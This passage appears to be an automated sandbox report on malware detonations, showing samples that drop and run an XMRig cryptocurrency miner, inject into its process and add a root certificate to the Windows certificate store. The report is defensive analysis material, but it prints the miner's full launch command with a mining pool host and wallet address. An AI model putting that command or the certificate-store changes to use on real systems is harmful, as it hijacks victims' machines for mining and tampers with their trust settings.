memory/3496-57-0x00007FF783F00000-0x00007FF784A03000-memory.dmp
memory/3496-58-0x00007FF783F00000-0x00007FF784A03000-memory.dmp
memory/3496-59-0x00007FF783F00000-0x00007FF784A03000-memory.dmp
memory/3496-60-0x00007FF783F00000-0x00007FF784A03000-memory.dmp
memory/3496-61-0x00007FF783F00000-0x00007FF784A03000-memory.dmp
memory/3496-62-0x00007FF783F00000-0x00007FF784A03000-memory.dmp
memory/3496-63-0x00007FF783F00000-0x00007FF784A03000-memory.dmp
memory/3496-64-0x00007FF783F00000-0x00007FF784A03000-memory.dmp
memory/3496-65-0x00007FF783F00000-0x00007FF784A03000-memory.dmp
memory/3496-66-0x00007FF783F00000-0x00007FF784A03000-memory.dmp
memory/3496-67-0x00007FF783F00000-0x00007FF784A03000-memory.dmp
memory/3496-68-0x00007FF783F00000-0x00007FF784A03000-memory.dmp
memory/3496-69-0x00007FF783F00000-0x00007FF784A03000-memory.dmp
memory/3496-70-0x00007FF783F00000-0x00007FF784A03000-memory.dmp
memory/3496-71-0x00007FF783F00000-0x00007FF784A03000-memory.dmp
memory/3496-72-0x00007FF783F00000-0x00007FF784A03000-memory.dmp
memory/3496-73-0x00007FF783F00000-0x00007FF784A03000-memory.dmp
memory/3496-74-0x00007FF783F00000-0x00007FF784A03000-memory.dmp
memory/3496-75-0x00007FF783F00000-0x00007FF784A03000-memory.dmp
memory/3496-76-0x00007FF783F00000-0x00007FF784A03000-memory.dmp
memory/3496-77-0x00007FF783F00000-0x00007FF784A03000-memory.dmp
memory/3496-78-0x00007FF783F00000-0x00007FF784A03000-memory.dmp
memory/3496-79-0x00007FF783F00000-0x00007FF784A03000-memory.dmp
memory/3496-80-0x00007FF783F00000-0x00007FF784A03000-memory.dmp
memory/3496-81-0x00007FF783F00000-0x00007FF784A03000-memory.dmp
memory/3496-82-0x00007FF783F00000-0x00007FF784A03000-memory.dmp
Analysis: behavioral19
Detonation Overview
Submitted
2024-06-13 14:58
Reported
2024-06-13 16:17
Platform
win10v2004-20240611-en
Max time kernel
1793s
Max time network
1799s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3752 wrote to memory of 3932 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 3752 wrote to memory of 3932 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.90.14.23.in-addr.arpa | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| BE | 23.41.178.66:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 66.178.41.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| BE | 23.41.178.75:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 75.178.41.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 105.193.132.51.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/3932-14-0x000002416A1D0000-0x000002416A1F0000-memory.dmp
memory/3932-15-0x000002416A220000-0x000002416A240000-memory.dmp
memory/3932-16-0x00007FF7CCB40000-0x00007FF7CD643000-memory.dmp
memory/3932-18-0x000002416A260000-0x000002416A280000-memory.dmp
memory/3932-17-0x000002416A240000-0x000002416A260000-memory.dmp
memory/3932-19-0x00007FF7CCB40000-0x00007FF7CD643000-memory.dmp
memory/3932-20-0x00007FF7CCB40000-0x00007FF7CD643000-memory.dmp
memory/3932-23-0x000002416A260000-0x000002416A280000-memory.dmp
memory/3932-22-0x000002416A240000-0x000002416A260000-memory.dmp
memory/3932-21-0x00007FF7CCB40000-0x00007FF7CD643000-memory.dmp
memory/3932-24-0x00007FF7CCB40000-0x00007FF7CD643000-memory.dmp
memory/3932-25-0x00007FF7CCB40000-0x00007FF7CD643000-memory.dmp
memory/3932-26-0x00007FF7CCB40000-0x00007FF7CD643000-memory.dmp
memory/3932-27-0x00007FF7CCB40000-0x00007FF7CD643000-memory.dmp
memory/3932-28-0x00007FF7CCB40000-0x00007FF7CD643000-memory.dmp
memory/3932-29-0x00007FF7CCB40000-0x00007FF7CD643000-memory.dmp
memory/3932-30-0x00007FF7CCB40000-0x00007FF7CD643000-memory.dmp
memory/3932-31-0x00007FF7CCB40000-0x00007FF7CD643000-memory.dmp
memory/3932-32-0x00007FF7CCB40000-0x00007FF7CD643000-memory.dmp
memory/3932-33-0x00007FF7CCB40000-0x00007FF7CD643000-memory.dmp
memory/3932-34-0x00007FF7CCB40000-0x00007FF7CD643000-memory.dmp
memory/3932-35-0x00007FF7CCB40000-0x00007FF7CD643000-memory.dmp
memory/3932-36-0x00007FF7CCB40000-0x00007FF7CD643000-memory.dmp
memory/3932-37-0x00007FF7CCB40000-0x00007FF7CD643000-memory.dmp
memory/3932-38-0x00007FF7CCB40000-0x00007FF7CD643000-memory.dmp
memory/3932-39-0x00007FF7CCB40000-0x00007FF7CD643000-memory.dmp
memory/3932-40-0x00007FF7CCB40000-0x00007FF7CD643000-memory.dmp
memory/3932-41-0x00007FF7CCB40000-0x00007FF7CD643000-memory.dmp
memory/3932-42-0x00007FF7CCB40000-0x00007FF7CD643000-memory.dmp
memory/3932-43-0x00007FF7CCB40000-0x00007FF7CD643000-memory.dmp
memory/3932-44-0x00007FF7CCB40000-0x00007FF7CD643000-memory.dmp
memory/3932-45-0x00007FF7CCB40000-0x00007FF7CD643000-memory.dmp
memory/3932-46-0x00007FF7CCB40000-0x00007FF7CD643000-memory.dmp
memory/3932-47-0x00007FF7CCB40000-0x00007FF7CD643000-memory.dmp
memory/3932-48-0x00007FF7CCB40000-0x00007FF7CD643000-memory.dmp
memory/3932-49-0x00007FF7CCB40000-0x00007FF7CD643000-memory.dmp
memory/3932-50-0x00007FF7CCB40000-0x00007FF7CD643000-memory.dmp
memory/3932-51-0x00007FF7CCB40000-0x00007FF7CD643000-memory.dmp
memory/3932-52-0x00007FF7CCB40000-0x00007FF7CD643000-memory.dmp
memory/3932-53-0x00007FF7CCB40000-0x00007FF7CD643000-memory.dmp
memory/3932-54-0x00007FF7CCB40000-0x00007FF7CD643000-memory.dmp
memory/3932-55-0x00007FF7CCB40000-0x00007FF7CD643000-memory.dmp
memory/3932-56-0x00007FF7CCB40000-0x00007FF7CD643000-memory.dmp
memory/3932-57-0x00007FF7CCB40000-0x00007FF7CD643000-memory.dmp
memory/3932-58-0x00007FF7CCB40000-0x00007FF7CD643000-memory.dmp
memory/3932-59-0x00007FF7CCB40000-0x00007FF7CD643000-memory.dmp
memory/3932-60-0x00007FF7CCB40000-0x00007FF7CD643000-memory.dmp
memory/3932-61-0x00007FF7CCB40000-0x00007FF7CD643000-memory.dmp
memory/3932-62-0x00007FF7CCB40000-0x00007FF7CD643000-memory.dmp
memory/3932-63-0x00007FF7CCB40000-0x00007FF7CD643000-memory.dmp
memory/3932-64-0x00007FF7CCB40000-0x00007FF7CD643000-memory.dmp
memory/3932-65-0x00007FF7CCB40000-0x00007FF7CD643000-memory.dmp
memory/3932-66-0x00007FF7CCB40000-0x00007FF7CD643000-memory.dmp
memory/3932-67-0x00007FF7CCB40000-0x00007FF7CD643000-memory.dmp
memory/3932-68-0x00007FF7CCB40000-0x00007FF7CD643000-memory.dmp
memory/3932-69-0x00007FF7CCB40000-0x00007FF7CD643000-memory.dmp
memory/3932-70-0x00007FF7CCB40000-0x00007FF7CD643000-memory.dmp
memory/3932-71-0x00007FF7CCB40000-0x00007FF7CD643000-memory.dmp
memory/3932-72-0x00007FF7CCB40000-0x00007FF7CD643000-memory.dmp
memory/3932-73-0x00007FF7CCB40000-0x00007FF7CD643000-memory.dmp
memory/3932-74-0x00007FF7CCB40000-0x00007FF7CD643000-memory.dmp
memory/3932-75-0x00007FF7CCB40000-0x00007FF7CD643000-memory.dmp
memory/3932-76-0x00007FF7CCB40000-0x00007FF7CD643000-memory.dmp
memory/3932-77-0x00007FF7CCB40000-0x00007FF7CD643000-memory.dmp
memory/3932-78-0x00007FF7CCB40000-0x00007FF7CD643000-memory.dmp
memory/3932-79-0x00007FF7CCB40000-0x00007FF7CD643000-memory.dmp
memory/3932-80-0x00007FF7CCB40000-0x00007FF7CD643000-memory.dmp
memory/3932-81-0x00007FF7CCB40000-0x00007FF7CD643000-memory.dmp
memory/3932-82-0x00007FF7CCB40000-0x00007FF7CD643000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-06-13 14:58
Reported
2024-06-13 15:59
Platform
win10v2004-20240508-en
Max time kernel
1791s
Max time network
1799s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4356,i,15142778360084620907,1763097090506261076,262144 --variations-seed-version --mojo-platform-channel-handle=4744 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3804,i,15142778360084620907,1763097090506261076,262144 --variations-seed-version --mojo-platform-channel-handle=1424 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
Files
Analysis: behavioral8
Detonation Overview
Submitted
2024-06-13 14:58
Reported
2024-06-13 16:10
Platform
win10v2004-20240508-en
Max time kernel
1775s
Max time network
1787s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
Files
Analysis: behavioral18
Detonation Overview
Submitted
2024-06-13 14:58
Reported
2024-06-13 16:17
Platform
win10v2004-20240611-en
Max time kernel
1793s
Max time network
1800s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726